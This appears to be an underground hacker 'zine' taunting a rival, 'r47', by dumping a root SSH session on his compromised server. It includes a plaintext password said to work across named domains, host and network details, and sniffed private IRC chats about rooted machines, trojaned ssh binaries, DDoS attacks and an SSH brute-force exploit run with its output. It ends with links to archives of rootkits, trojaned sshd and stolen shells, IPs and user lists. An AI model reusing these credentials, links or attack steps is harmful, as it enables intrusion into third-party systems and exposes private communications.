> @@@@@@ @@@@@@
> @@ @@ @@ @@
>
>
> @@ @@ @@ @@@ @@ @@ @@ @@@ @@ @@
> @@ @@ @@ @ @@ @@ @@ @@ @ @@ @@ @@
> IIII II I II IIII II I II IIII
> IIII III II IIII III II IIII
>
>
> II II II II II II II II II II
> II II IIIIII II II IIIIII II II
> **** Linux noelrosa.iq.usp.br
<http://noelrosa.iq.usp.br> 2.6.9-42.0.10.EL x86_64 **** ->>>>
new kool motd, n1cE rIpZ
>
>
>
> [root[@noelrosa ~]#
>
> <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< s0RrY bUT
We g0T tiReD oF pAstIng StUfF lIkE thAT
> > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > >
>
>
> -;;;;;;; i think thats enough to paste, right ?
> -;;;;;; anyway, in the end/bottom of this 'zine' there is a file
to download with some of the ip's that weve got from them
>
> -/-/-/-/-/-/-/-/-/-/ lEtz havE fuN WiTH r47's BnC rigHT noW
-/-/-/-/-/-/-/-/-/-/
>
>
>
> r47 is r47@bl4ckh47.org <mailto:r47@bl4ckh47.org> * i own
u! [and We own you!]
> r47 on @#combat #osiris @#/<-rad
> r47 using irc.ipv6.he.net <http://irc.ipv6.he.net> Hurricane
Electric IPV6 IRC Server
>
>
> r47 actually using host 2001:470:1f15:42b::3
> r47 End of /WHOIS list.
>
> central@labsec [~xoxox/h3h3] # ssh root@bl4ckh47.org
<mailto:root@bl4ckh47.org> -p 2222 bash
>
> root@bl4ckh47.org <mailto:root@bl4ckh47.org>'s password:
.niklincith08. (same pass goes for all casablanca.cz/eurosignal.cz
<http://casablanca.cz/eurosignal.cz>)
>
>
> uname -a;w;hostname -f
> Linux VoIP-Mnisek 2.6.18-3-k7-pj #2 Tue Feb 27 18:30:13 CET 2007
i686 GNU/Linux
> 10:13:26 up 162 days, 8:25, 0 users, load average: 0.04, 0.05, 0.01
> USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
>
>
> VoIP.eurosignal.cz <http://VoIP.eurosignal.cz>
>
> sit0 Link encap:IPv6-in-IPv4
> inet6 addr: ::10.0.2.254/96 <http://10.0.2.254/96>
Scope:Compat
>
> inet6 addr: ::127.0.0.1/96 <http://127.0.0.1/96>
Scope:Unknown
>
> inet6 addr: ::10.0.2.4/96 <http://10.0.2.4/96> Scope:Compat
> inet6 addr: ::77.78.84.242/96 <http://77.78.84.242/96>
Scope:Compat
> UP RUNNING NOARP MTU:1480 Metric:1
>
>
> RX packets:0 errors:0 dropped:0 overruns:0 frame:0
> TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
> collisions:0 txqueuelen:0
> RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
>
>
>
> sit1 Link encap:IPv6-in-IPv4
> inet6 addr: 2001:470:1f15:42b::2/64 Scope:Global
> inet6 addr: 2001:470:1f15:42b::3/64 Scope:Global
> inet6 addr: 2001:470:1f15:42b::4/64 Scope:Global
>
>
> inet6 addr: 2001:470:1f15:42b::5/64 Scope:Global
> inet6 addr: 2001:470:1f15:42b::6/64 Scope:Global
> inet6 addr: 2001:470:1f15:42b::7/64 Scope:Global
> inet6 addr: fe80::a00:2fe/64 Scope:Link
>
>
> inet6 addr: fe80::a00:204/64 Scope:Link
> inet6 addr: fe80::4d4e:54f2/64 Scope:Link
> UP POINTOPOINT RUNNING NOARP MTU:1480 Metric:1
> RX packets:16700 errors:0 dropped:0 overruns:0 frame:0
>
>
> TX packets:9917 errors:0 dropped:0 overruns:0 carrier:0
> collisions:0 txqueuelen:0
> RX bytes:1677861 (1.6 MiB) TX bytes:982003 (958.9 KiB)
>
> tcp 0 0 77.48.84.242:65535
<http://77.48.84.242:65535> 189.4.189.139:61593
<http://189.4.189.139:61593> ESTABLISHED
>
>
> tcp6 0 0 2001:470:1f15:42b:51338 2001:41e0:5::6667:6667
ESTABLISHED
> tcp6 0 0 2001:470:1f15:42b:49197 2001:470:0:6667::2:6667
ESTABLISHED
> tcp6 0 0 2001:470:1f15:42b:48159 2001:40a8:3000:1:0:6667
ESTABLISHED
>
>
> tcp6 0 0 2001:470:1f15:42b:51411 2001:40a8:3000:1:0:6667
ESTABLISHED
>
> perl 12655 root 4u IPv4 3027913 TCP *:65535
(LISTEN)
> root 12655 0.0 0.3 5256 3220 ? S Mar19 2:39
supervise log
>
>
> - nice process name btw
> - lets start the sniffer, shall we? - btw im using the ircsniff.pl
you stole from efnet's box, thanks -
>
> <- :d0n_!burnout@burnout.bitchx.org
<mailto:burnout@burnout.bitchx.org> PRIVMSG r47 :u know d0n
>
>
> <- :d0n_!burnout@burnout.bitchx.org
<mailto:burnout@burnout.bitchx.org> PRIVMSG r47 :he took my nick
> <- :d0n_!burnout@burnout.bitchx.org
<mailto:burnout@burnout.bitchx.org> PRIVMSG r47 :he's packeting me
>
>
> <- :d0n_!burnout@burnout.bitchx.org
<mailto:burnout@burnout.bitchx.org> PRIVMSG r47 :;\
> -> PRIVMSG d0n_ :d0n No such nick/channel
> -> PRIVMSG d0n_ :d0n End of /WHOIS list.
> -> PRIVMSG d0n_ :change
>
>
> <- :d0n!burnout@burnout.bitchx.org
<mailto:burnout@burnout.bitchx.org> PRIVMSG r47 :lamer :(
> <- :d0n!burnout@burnout.bitchx.org
<mailto:burnout@burnout.bitchx.org> PRIVMSG r47 :owns my dsl
>
>
> <- :d0n!burnout@burnout.bitchx.org
<mailto:burnout@burnout.bitchx.org> PRIVMSG r47 :real leet
> -> PRIVMSG d0n :who ?
> <- :d0n!burnout@burnout.bitchx.org
<mailto:burnout@burnout.bitchx.org> PRIVMSG r47 :that d0n guy
>
>
> <- :d0n!burnout@burnout.bitchx.org
<mailto:burnout@burnout.bitchx.org> PRIVMSG r47 :had my nick
> <- :d0n!burnout@burnout.bitchx.org
<mailto:burnout@burnout.bitchx.org> PRIVMSG r47 :was talking shit
>
>
> <- :d0n!burnout@burnout.bitchx.org
<mailto:burnout@burnout.bitchx.org> PRIVMSG r47 :"here comes the ddos"
he said
> -> PRIVMSG d0n :fuck
> -> PRIVMSG d0n :lets hack him
>
> -> PRIVMSG d0n :not hard target
>
> -> PRIVMSG d0n :hehehe
> -> PRIVMSG d0n :to me
> <- :d0n!burnout@burnout.bitchx.org
<mailto:burnout@burnout.bitchx.org> PRIVMSG r47 :HHEHEHEEH\
> -> PRIVMSG d0n ::>:>:>:>
>
> -> PRIVMSG d0n :sup bitchx
>
> -> PRIVMSG d0n ::>
> <- :d0n!burnout@burnout.bitchx.org
<mailto:burnout@burnout.bitchx.org> PRIVMSG r47 ::)
> -> PRIVMSG d0n :bitchx bugged
> -> PRIVMSG d0n :do u use it ?
>
> <- :d0n!burnout@burnout.bitchx.org
<mailto:burnout@burnout.bitchx.org> PRIVMSG r47 :the client?
>
> -> PRIVMSG d0n :yah
> -> PRIVMSG d0n :0dayz
> <- :d0n!burnout@burnout.bitchx.org
<mailto:burnout@burnout.bitchx.org> PRIVMSG r47 :no shit..
> -> PRIVMSG d0n :eheh
>
> *********************** run to the hillz he h4s b1tchx 0d4y
**********************
>
>
>
> -> PRIVMSG d0n :i have windows on linux
(vmware) ->>>>>>>>>>>>>>>>>>>>> lies
> -> PRIVMSG d0n :hjmm
> -> PRIVMSG d0n :;>
>
>
> <- :d0n!burnout@burnout.bitchx.org
<mailto:burnout@burnout.bitchx.org> PRIVMSG r47 :ah yeah
> -> PRIVMSG d0n :omfg
> <- :d0n!burnout@burnout.bitchx.org
<mailto:burnout@burnout.bitchx.org> PRIVMSG r47 :any more fun with efnet
soon?
>
>
> -> PRIVMSG d0n :im still drunked
> -> PRIVMSG d0n :no more
> <- :d0n!burnout@burnout.bitchx.org
<mailto:burnout@burnout.bitchx.org> PRIVMSG r47 :HEHE
> -> PRIVMSG d0n :im stoped with x0x0x
>
> <- :d0n!burnout@burnout.bitchx.org
<mailto:burnout@burnout.bitchx.org> PRIVMSG r47 :;p
>
> -> PRIVMSG d0n :just sniffing idiots
now ->>>>>>>>>>>>>>>>>>>> so we are
>
> *********************** /laugh time
********************************************
>
>
> -> PRIVMSG accuser :nem
> -> PRIVMSG accuser :nao me comunico mais com povo
br ->>>>>>>>>>>>>>>>>>>>
> -> PRIVMSG accuser :nao eh meu nivel
>
>
> -> PRIVMSG accuser :so alguns amigos
> -> PRIVMSG accuser :nego roubo meu canal
ontem ->>>>>>>>>>>>>>>>>>>> some guyz
stole my network baby
>
>
> -> PRIVMSG accuser :recuperei
> -> PRIVMSG accuser :e tomei o nick
deles ->>>>>>>>>>>>>>>>>>>> i
ddosed them and got their nicks
>
>
> -> PRIVMSG accuser :/w psys
> -> PRIVMSG accuser :/w dtr
> -> PRIVMSG accuser
> hehehe
->>>>>>>>>>>>>>>>>>>> now i feel gr8
>
>
> <- :accuser!~psy@64.244.62.214 <mailto:psy@64.244.62.214> PRIVMSG
r47 :eu vi
> <- :accuser!~psy@64.244.62.214 <mailto:psy@64.244.62.214> PRIVMSG
r47 :o psys tacando monte de bot
>
> -> PRIVMSG accuser :comigo eh dificil um br
poder ->>>>>>>>>>>>>>>>>>>>
HAHAHAHAHAHAHAHAAHHAHAHAHAHAHAHAHA (12x)
>
> -> PRIVMSG accuser :hehehe
> -> PRIVMSG accuser :eu
mando!
->>>>>>>>>>>>>>>>>>>> im THE guy!
> -> PRIVMSG accuser :eu to mo fora de guerra cara
>
>
> -> PRIVMSG accuser :mas parece q os caras me perseguem
> -> PRIVMSG accuser :e sismam q sou
lamer ->>>>>>>>>>>>>>>>>>>> /me laughs
>
>
> -> PRIVMSG accuser :rs
>
> -> PRIVMSG sexybaby :itsme q_+T*/81_3|Z3g;
r47 ->>>>>>>>>>>>>>>>>>>> hiz botz,
thanks for sharing
>
>
> -> PRIVMSG sexybaby :op q_+T*/81_3|Z3g;
> sexybaby on @#brasil @+#Sonya @#24/7 @+#prank @#unforgiven
@#serious @#xanax ->>>>>>>>>>>>>>>>>>>> 3h3h3h3
>
>
>
> <- :KoaL4!h@216.75.56.186 <mailto:h@216.75.56.186> PRIVMSG r47 :c
vai me ajeita un trem que presta entum? ->>>>>>>>>>>>>>>>> gimm3 a b0x
>
> -> PRIVMSG KoaL4 :cara
>
> -> PRIVMSG KoaL4 :vou
> -> PRIVMSG KoaL4 :mas nao me atrapalha
> -> PRIVMSG KoaL4 :to aki programando
> -> PRIVMSG KoaL4 :pra um cliente chato pra kct
>
> <- :\g4br13l\!~ucvn@server3.erz.univie.ac.at
<mailto:ucvn@server3.erz.univie.ac.at> PRIVMSG r47 :ta
>
>
> <- :\g4br13l\!~ucvn@server3.erz.univie.ac.at
<mailto:ucvn@server3.erz.univie.ac.at> PRIVMSG r47 :arrumando truta
> <- :\g4br13l\!~ucvn@server3.erz.univie.ac.at
<mailto:ucvn@server3.erz.univie.ac.at> PRIVMSG r47 :com os cara da
defland pq
>
>
> <- :\g4br13l\!~ucvn@server3.erz.univie.ac.at
<mailto:ucvn@server3.erz.univie.ac.at> PRIVMSG r47 :?
> -> PRIVMSG \g4br13l\ :falaram meu nome em vao
> -> PRIVMSG \g4br13l\ :nao qro isso
>
> -> PRIVMSG \g4br13l\ :so isso
>
> <- :\g4br13l\!~ucvn@server3.erz.univie.ac.at
<mailto:ucvn@server3.erz.univie.ac.at> PRIVMSG r47 :r47
> <- :\g4br13l\!~ucvn@server3.erz.univie.ac.at
<mailto:ucvn@server3.erz.univie.ac.at> PRIVMSG r47 :tu se esquenta
>
>
> <- :\g4br13l\!~ucvn@server3.erz.univie.ac.at
<mailto:ucvn@server3.erz.univie.ac.at> PRIVMSG r47 :com bobagem
> -> PRIVMSG \g4br13l\ :hehee
> <- :\g4br13l\!~ucvn@server3.erz.univie.ac.at
<mailto:ucvn@server3.erz.univie.ac.at> PRIVMSG r47 :?
>
>
> -> PRIVMSG \g4br13l\ :nao qro pivete
> -> PRIVMSG \g4br13l\ :de merda
> -> PRIVMSG \g4br13l\ :kiddie
> -> PRIVMSG \g4br13l\ :falando de mim
> -> PRIVMSG \g4br13l\ :pq qm
manda ----->>>>>>>>>>>>>
HAHAHAHAHAHAHAHAHAHAHAHA
>
>
> -> PRIVMSG \g4br13l\ :sou
eu ----->>>>>>>>>>>>>
HAHAHAHAHAHAHAHAHAHAHAHA
> -> PRIVMSG \g4br13l\ ::>
> -> PRIVMSG \g4br13l\ :esse univie.ac.at <http://univie.ac.at> eh show
>
>
> -> PRIVMSG \g4br13l\ :tenho a www la
> -> PRIVMSG \g4br13l\ ::>
> -> PRIVMSG \g4br13l\ :usam checkpoint firewall
one ----->>>>>>>>>>>>> what the fuck ?
>
>
> -> PRIVMSG \g4br13l\ :tunnelling by
trace ----->>>>>>>>>>>>> ?!?1
> -> PRIVMSG \g4br13l\ :mto dificil pacota-la
>
>
> *********************** boyfriends are fighting - portuguese only,
sorry **********************
>
>
> -> PRIVMSG #thc :skotch is gay
> -> PRIVMSG skotch :eai vagabunda
> -> PRIVMSG skotch :vai fica na putaria ateh qdo
> -> PRIVMSG skotch :to cheio de novidades
> -> PRIVMSG skotch :e para de me chamar de verme
>
>
> -> PRIVMSG skotch :rs
> <- ::skotch!~skotch@d0nt.bl4m3.4.l33tzor.org
<mailto:skotch@d0nt.bl4m3.4.l33tzor.org> PRIVMSG r47 :vai toma no meu do
teu cuh rapa, n qro papo contigo e ve se para de fica mandando alerta no
meu nextel -> gtfo
>
>
> -> PRIVMSG skotch :ahahaha
> -> PRIVMSG skotch :vc tem
certeza ->>>>>>>>> are you sure baby ?
> -> PRIVMSG skotch :entao eh isso ?
> -> PRIVMSG skotch :ja era ?:
>
>
> -> PRIVMSG skotch :ja era ?
> <- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org
<mailto:skotch@d0nt.bl4m3.4.l33tzor.org> PRIVMSG r47 :sim
> -> PRIVMSG skotch :eu nao vou voltar aki denovo
>
> -> PRIVMSG skotch :pra falar com vc
>
> -> PRIVMSG skotch :ja era ?
> -> PRIVMSG skotch
> CERTEZA? ->>>>>>>> are you
sure we are breaking apart?????
> <- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org
<mailto:skotch@d0nt.bl4m3.4.l33tzor.org> PRIVMSG r47 :alias quem ta
oltando aki direto eh vc, eu to na minha faz tempo
>
>
> -> PRIVMSG skotch :to na minha tb
> -> PRIVMSG skotch :so acho
> <- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org
<mailto:skotch@d0nt.bl4m3.4.l33tzor.org> PRIVMSG r47 :vc fala merda e
dps quer voltar a tras
>
>
> <- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org
<mailto:skotch@d0nt.bl4m3.4.l33tzor.org> PRIVMSG r47 :coisa de mlk
> -> PRIVMSG skotch :filho
> -> PRIVMSG skotch :eu so acho
> -> PRIVMSG skotch :q eh besteira
>
>
> -> PRIVMSG skotch :agente brigasr por isso
> -> PRIVMSG skotch :so isso
> <- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org
<mailto:skotch@d0nt.bl4m3.4.l33tzor.org> PRIVMSG r47 :mermao n eh a
primeira vez
>
>
> <- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org
<mailto:skotch@d0nt.bl4m3.4.l33tzor.org> PRIVMSG r47 :q tu da dessas
> <- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org
<mailto:skotch@d0nt.bl4m3.4.l33tzor.org> PRIVMSG r47 :vem falando bosta
>
>
> > skotch!~skotch@d0nt.bl4m3.4.l33tzor.org
<mailto:skotch@d0nt.bl4m3.4.l33tzor.org> PRIVMSG r47 :e dps vem se
desculpando
> -> PRIVMSG skotch :so joguei um verde
> <- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org
<mailto:skotch@d0nt.bl4m3.4.l33tzor.org> PRIVMSG r47 :n so esses verme
de merda
>
>
> <- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org
<mailto:skotch@d0nt.bl4m3.4.l33tzor.org> PRIVMSG r47 :q paga pau pra vc
> -> PRIVMSG skotch :nao vou fazer isso denovo
> <- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org
<mailto:skotch@d0nt.bl4m3.4.l33tzor.org> PRIVMSG r47 :q aceita tudo q vc
fala
>
>
> -> PRIVMSG skotch :whatever
> -> PRIVMSG skotch :nao falei q tu paga sapo pra mim
> -> PRIVMSG skotch :tu tb
> -> PRIVMSG skotch :eh cheio das noia q nem eu
> <- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org
<mailto:skotch@d0nt.bl4m3.4.l33tzor.org> PRIVMSG r47 :tu soh mostro q n
confia
>
>
> <- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org
<mailto:skotch@d0nt.bl4m3.4.l33tzor.org> PRIVMSG r47 :axando q eu passo
maq pra xscholler
> <- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org
<mailto:skotch@d0nt.bl4m3.4.l33tzor.org> PRIVMSG r47 :aff
>
>
> -> PRIVMSG skotch :porra
> -> PRIVMSG skotch :tu some
> -> PRIVMSG skotch :so joguei um verde
> -> PRIVMSG skotch :se nao confiasse
> -> PRIVMSG skotch :tu nao tinha
> -> PRIVMSG skotch :tds minhas box
>
>
> -> PRIVMSG skotch :TODAS
> -> PRIVMSG skotch :fdp
> -> PRIVMSG skotch :outra coisa
> -> PRIVMSG skotch :descobri
> -> PRIVMSG skotch :o klux
> -> PRIVMSG skotch :tem root na importec ->>>>>>
klux has root in importec[their box] (you are right sir!)
>
>
> -> PRIVMSG skotch :NAO USA MAIS ELA DE PONTE ->>>>>>
dont use it as bounce anymore! (kinda late)
> <- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org
<mailto:skotch@d0nt.bl4m3.4.l33tzor.org> PRIVMSG r47 :n vem dessas q qdo
mandei o skotch.txt tinha mta maq la q vc nem tinha ownado, q eu tinha
ownado sozinho
>
>
> -> PRIVMSG skotch :e varias box.. ele so troca o ssh binario
> -> PRIVMSG skotch :pra sniffa
> <- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org
<mailto:skotch@d0nt.bl4m3.4.l33tzor.org> PRIVMSG r47 :n to usando mais
importec faz tempo
>
>
> -> PRIVMSG skotch :fica ligeiro
> -> PRIVMSG skotch :eu formatei ele
> -> PRIVMSG skotch :deproposito
> -> PRIVMSG skotch :ele veio no meu pvt
> -> PRIVMSG skotch :colo uma pa de merda
> -> PRIVMSG skotch :ele sabe da ig
>
>
> -> PRIVMSG skotch :da locaweb
> -> PRIVMSG skotch :da pop
> -> PRIVMSG skotch :<skotch> n vem dessas q qdo mandei o skotch.txt
tinha mta maq la q vc nem tinha ownado, q eu tinha ownado sozinho
> -> PRIVMSG skotch :e vice versa
>
>
> -> PRIVMSG skotch :q seja
> -> PRIVMSG skotch :ouytra coisa
> -> PRIVMSG skotch :peguei coisa quente
> -> PRIVMSG skotch :sshd
> -> PRIVMSG skotch :hehehe
> -> PRIVMSG skotch :remote expl
> -> PRIVMSG skotch :openbsd local ->>>>>>>>>>
y0y0 juz g0t a openbsd local (right, check it on milw0rm, asshole)
>
>
> -> PRIVMSG skotch :tu fica de putaria
> -> PRIVMSG skotch :agente perdendo tempo
> <- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org
<mailto:skotch@d0nt.bl4m3.4.l33tzor.org> PRIVMSG r47 :o openbsd vc a
mando faz tempo
>
>
> -> PRIVMSG skotch :mas esse novo nao
> -> PRIVMSG skotch :entra na merda do msn
> -> PRIVMSG skotch :e para de putaria
> -> PRIVMSG skotch :por besteira
> -> PRIVMSG skotch :vou te desblokear ->>>>>>>>>
i'll unblock ya from msn babe! plz come back !
>
>
> <- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org
<mailto:skotch@d0nt.bl4m3.4.l33tzor.org> PRIVMSG r47 :to indo pro trampo
> -> PRIVMSG skotch :vai para com a putaria de merda ?
> <- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org
<mailto:skotch@d0nt.bl4m3.4.l33tzor.org> PRIVMSG r47 :quem fica de
putaria eh vc, falando bosta sem saber de nada
>
>
> -> PRIVMSG skotch : *
> -> PRIVMSG skotch : * eXstacy ~ # gcc sshexploit.c -o sshex -lssh
> -> PRIVMSG skotch : * eXstacy ~ # ./sshex -h laggy.org
<http://laggy.org> -l xxxxx -d keys/ ->>>>>>> w0w, this is
certainly a 0day, right ? /me rolling on the floor laughing
>
>
> -> PRIVMSG skotch : * [!] KEY FOUND!
> -> PRIVMSG skotch : * [!] Logging in...
> -> PRIVMSG skotch : * Last login: Fri Aug 15 16:05:43 2008 from
xxxxxxxxxxxxxxxxx
> -> PRIVMSG skotch : * xxxxx@digitaljunk ~ $
>
>
> -> PRIVMSG skotch : *
> -> PRIVMSG skotch : * Not that practical since it doesnt use
threads, but the code shows
> -> PRIVMSG skotch : * howto make a ssh client from scratch using
libssh for what purpose
>
> <- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org
<mailto:skotch@d0nt.bl4m3.4.l33tzor.org> PRIVMSG r47 :procura se
informar primeiro antes de falar merda
>
> -> PRIVMSG skotch :so joguei verde
> -> PRIVMSG skotch :sou noiado
> -> PRIVMSG skotch :vc tb he
> -> PRIVMSG skotch :normal
> <- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org
<mailto:skotch@d0nt.bl4m3.4.l33tzor.org> PRIVMSG r47 :esse ai eh um
bruteforce q usa um bug do ssh
>
>
> -> PRIVMSG skotch :nao fiz mal nenhum pra vc
> <- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org
<mailto:skotch@d0nt.bl4m3.4.l33tzor.org> PRIVMSG r47 :pode demorar horas
pra achar a key certa
>
> -> PRIVMSG skotch :nao
>
> -> PRIVMSG skotch :de 5 a 10 min
> -> PRIVMSG skotch :o coideloko ja ta melhorando ele
> -> PRIVMSG skotch :pra demorar menos
> -> PRIVMSG skotch :hehe
> -> PRIVMSG skotch :a oi ta bugada
> -> PRIVMSG skotch :ele FUNCIONA
>
>
> -> PRIVMSG skotch :e jaja
> -> PRIVMSG skotch :to com 0day pra samba
> -> PRIVMSG skotch :aguarde
> <- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org
<mailto:skotch@d0nt.bl4m3.4.l33tzor.org> PRIVMSG r47 :so falo
>
>
> <- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org
<mailto:skotch@d0nt.bl4m3.4.l33tzor.org> PRIVMSG r47 :pra vc fica esperto
> <- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org
<mailto:skotch@d0nt.bl4m3.4.l33tzor.org> PRIVMSG r47 :q tem gringo
>
>
> <- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org
<mailto:skotch@d0nt.bl4m3.4.l33tzor.org> PRIVMSG r47 :te sniffando
> <- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org
<mailto:skotch@d0nt.bl4m3.4.l33tzor.org> PRIVMSG r47 :pq fikei sabendo
>
>
> -> PRIVMSG skotch :ta loko ?
> -> PRIVMSG skotch :so se for na bnc
> -> PRIVMSG skotch :hehehe
> <- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org
<mailto:skotch@d0nt.bl4m3.4.l33tzor.org> PRIVMSG r47 :nego q ta falando
com vc
>
>
> -> PRIVMSG skotch :ateh entao nao ligo
> <- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org
<mailto:skotch@d0nt.bl4m3.4.l33tzor.org> PRIVMSG r47 :soh pra causar intriga
> -> PRIVMSG skotch :porra
>
> -> PRIVMSG skotch :tu eh meu amigo ou nao eh :?
>
> -> PRIVMSG skotch :<skotch> so falo
> -> PRIVMSG skotch :<skotch> pra vc fica esperto
> -> PRIVMSG skotch :<skotch> q tem gringo
> -> PRIVMSG skotch :<skotch> te sniffando
> -> PRIVMSG skotch :<skotch> pq fikei sabendo
>
>
> -> PRIVMSG skotch :qm sniffando ?
> -> PRIVMSG skotch :skotch
> -> PRIVMSG skotch :fala krl
> -> PRIVMSG skotch :skotch
> -> PRIVMSG skotch :skotch
> <- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org
<mailto:skotch@d0nt.bl4m3.4.l33tzor.org> PRIVMSG r47 :to comend mermao
>
>
> <- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org
<mailto:skotch@d0nt.bl4m3.4.l33tzor.org> PRIVMSG r47 :e to atrasado pro
trampo
> <- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org
<mailto:skotch@d0nt.bl4m3.4.l33tzor.org> PRIVMSG r47 :flw
>
>
> -> PRIVMSG skotch :cara
> -> PRIVMSG skotch :se tu continuar folgado
> -> PRIVMSG skotch :naovaidar
> -> PRIVMSG skotch :vai sew fude
> -> PRIVMSG skotch :fala direito
> <- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org
<mailto:skotch@d0nt.bl4m3.4.l33tzor.org> PRIVMSG r47 :isso eh facil de
vc descobrir, so vc ver quem se aproximo de vc
>
>
> <- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org
<mailto:skotch@d0nt.bl4m3.4.l33tzor.org> PRIVMSG r47 :ultimamente
> <- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org
<mailto:skotch@d0nt.bl4m3.4.l33tzor.org> PRIVMSG r47 :e n trocava ideia
antes
>
>
> <- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org
<mailto:skotch@d0nt.bl4m3.4.l33tzor.org> PRIVMSG r47 :so vc pensar
> -> PRIVMSG skotch :whatever
> -> PRIVMSG skotch :vc
> -> PRIVMSG skotch :e o thomaz
>
>
> -> PRIVMSG skotch :sao os unicos
> -> PRIVMSG skotch :q tem as m erda q tenho
> -> PRIVMSG skotch :UNICOS
> -> PRIVMSG skotch :mais ngm tem
> -> PRIVMSG skotch :nao confio em m ais NGM
> -> PRIVMSG skotch :eu acho q tu deveria me falar qm eh
>
>
> -> PRIVMSG skotch :so isso
> -> PRIVMSG skotch :e troquei de bnc ontemrs
> -> PRIVMSG skotch :e troquei de bnc ontem
rs ->>>>>> i changed my bnc yesterday! (we're glad)
>
>
> -> PRIVMSG rip :skotch said to me that are sniffing me
> -> PRIVMSG rip :but skotch dont know about
nothing ->>>>>> as always, backstabbing hiZ
boyfriend(skotch)
>
>
> /*
>
>
> * Geminid IIb. TCP/UDP/ICMP Packet flooder
> *
> * What can i say? Enjoy! :)
> * gr33tz: PoWerPr0 and godmode0
> *
>
> thanks for the gem source by the way!
>
> > > > there could be more logs, but some kool guyz cant stop ddosing
r47, so this is kind of boring to do
>
>
> > > anyway, if we get something else in the future, we will publish
again. thanks buddies.
> > random logs if you have nothing to do:
http://labsec.elite.vc/r47-1.log http://labsec.elite.vc/r47-2.log
>
>
>
>
##########################################################################
> # __ __ __
__ #
> #.----.| |--.---.-.-----.| |_.-----.----. | |_|
> --.----.-----.-----.#
>
>
> #| __|| | _ | _ || _| -__| _| | _| | _|
-__| -__|#
> #|____||__|__|___._| __||____|_____|__| |____|__|__|__|
> _____|_____|#
> #
> __| #
>
>
>
# #
> # - download
links #
>
##########################################################################
>
>
>
> <><> thiZ iZ ZeRIouZ buZInEzZ dewD!
> <><> http://labsec.elite.vc/x0x0x-suckY-sshd.tar.bz2
> <><> http://labsec.elite.vc/x0x0x-suckY-phalanx-suckit.tar.bz2
>
>
> <><>
http://labsec.elite.vc/x0x0x-suckY-shells-ips-users-allinone.tar.bz2 [we
are not sharing all of them, just some random ones]
>
>
>
> <><> please guyZ, make it priv8 ! (/me rolleyes :B)
>
> - kool&klean chapter.
>
>
##########################################################################
> # _ _
___ #
>
>
> # ___ | |_ ___ ___ _| |_ ___ _ _ | | '___ _ _ _
_ #
> # / | '| . |<_> || . \ | | / ._>| '_> | |-/ . \| | ||
'_> #
> # \_|_.|_|_|<___|| _/ |_| \___.|_| |_|
\___/`___||_| #
>
>
> #
> _| #
>
# #
> # -
conclusion #
>
>
>
##########################################################################
>
>
> ----------------- reflection time
> > .......... whats the point of all this ? prove that you are better
than someone ?
> > ......... what a joke. just coz you are lucky and had the chance
it doesnt mean you are bl4ckh47.
>
>
> > ........ your zines are pathetic. what the fuck is this 'messages'
shit in the bottom of them ?
> > ....... like you are able to hack someone by yourself, eh ? you
cant do shit x0x0x, you ARE shit.
> > ...... why thank soldiers and all blackhats? you dont belong to
any of them, none of them like you.
>
>
> > ..... why would someone send you a mail? nobody cares about you,
dipshit.
> > .... i cant really believe that you spent time creating a new mail
just koz of your second shit zine, hahahahaha what a joke
> > ... stop playing hacker, you are not hacker, - we are not hackers
-, you cant even do shellscript, get a life while you can.
>
>
> > .. a kiss to zmda
> > . think twice before you fuck with us, asshole. we know you, we
know what you can do, and we know what you cant do.
> > just to finish:
>
> ******************************** m355 w17h 7h3 beZt - diE liKE th3
r3s7 ********************************
>
>
> ;
> ;
> ; _____ __ _______
> ;| |_.---.-.| |--.| __|.-----.----.
> ;| | _ || _ ||__ || -__| __|
> ;|_______|___._||_____||_______||_____|____|
> ;
>
>
> ; _______ __ __ __
> ;|_ _|.-----.--| |.--.--.-----.| |_.----.|__|.-----.-----.
> ; _| |_ | | _ || | |__ --|| _| _|| || -__|__ --|
> ;|_______||__|__|_____||_____|_____||____|__| |__||_____|_____|
>
>
> ; ;
> ;
> ; #LABSEC @ EFNET - closed to friends, of course.
> ;
> ; klux/djow - include - input - r3n4t0 - memelo - deadcow - w3b -
kernel` - kylebond - fseek
>
>
> ;
> ; lAmE ZiNE wRitTeN bY:
> ;
> ; klux - spoof1 @RR0B@ gmail.com <http://gmail.com> - hAppY flOodiNg
> ;
> ;
> ; wE iZ watCHiNg U
> ******************************** m355 w17h 7h3 beZt - diE liKE th3
r3s7 ********************************
>
>
>
>
> _______________________________________________
